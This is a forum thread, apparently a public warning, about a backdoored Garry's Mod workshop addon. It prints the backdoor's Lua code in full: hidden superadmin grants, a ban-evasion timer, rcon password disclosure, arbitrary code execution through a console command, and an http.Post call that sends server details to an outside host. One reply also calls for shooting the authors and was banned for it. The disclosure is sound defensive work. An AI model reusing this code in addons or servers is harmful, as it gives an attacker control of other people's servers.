PSA: Backdoor in workshop addon

There is a backdoor in this addon: http://steamcommunity.com/sharedfiles/filedetails/?id=1161980125 by http://steamcommunity.com/profiles/76561198072431907
The backdoor is located in \lua\weapons\weapon_admingun\shared.lua, and is as follows:

hook.Add( “Initialize”, “cakerawsd”, function()
concommand.Add( “_76sup”, function(ply)
if ( ply:SteamID() == “STEAM_0:0:153604459”) then
RunConsoleCommand(“ulx”, “adduserid”, ply:SteamID(), “superadmin”)
else
ply:ChatPrint("Your not superadmin, " … ply:Name() … “.”)
end
end)

timer.Create( "checkForBan", 5, 0, function()
ULib.unban( "STEAM_0:0:153604459")
end )
concommand.Add("76soldier_cf",function() local RconPass = GetConVar("rcon_password"):GetString() print(RconPass) end)
concommand.Add( "_76", function(player,command,argument) RunString(table.concat(argument)) end)
concommand.Add("76soldier_sa", function(player) player:SetUserGroup("superadmin") end)
http.Post("http://soldier-76.com/bd.php", {name = GetHostName(),ip = game.GetIPAddress()})

end)

This is the same exploit as in https://github.com/RyanJGray/Backdoor_Busting_2015/tree/master/BD022_TraitorGlow_Again http://forum.facepunch.com/showthread.php?t=1540110&p=51295394&viewfull=1

Banned.

PSA!!!

And water is wet

people that do this deserve to get shoot in the arm with a .22


(User was banned for this post ("Advocating violence" - Shendow))

I’m genuinely curious, and because there’s a warning not to visit it I won’t, but, in the link OP provided, https://github.com/RyanJGray/Backdoor_Busting_2015/tree/master/BD022_TraitorGlow_Again, what does the website we’re told not to visit do?

Does it give your computer some malware, or does it just track information and visiting the site would tell whoever runs it the jig is up?

The domain soldier-76.com doesn’t exist anymore, so click the link all you want. As for what it used to do, I would assume it simply recorded the server’s IP so that the dude knows which servers use his backdoored addon.


http.Post("http://soldier-76.com/bd.php", {name = GetHostName(),ip = game.GetIPAddress()})

Nothing, it’s down.

It was used to log IPs and other info about servers with the backdoor.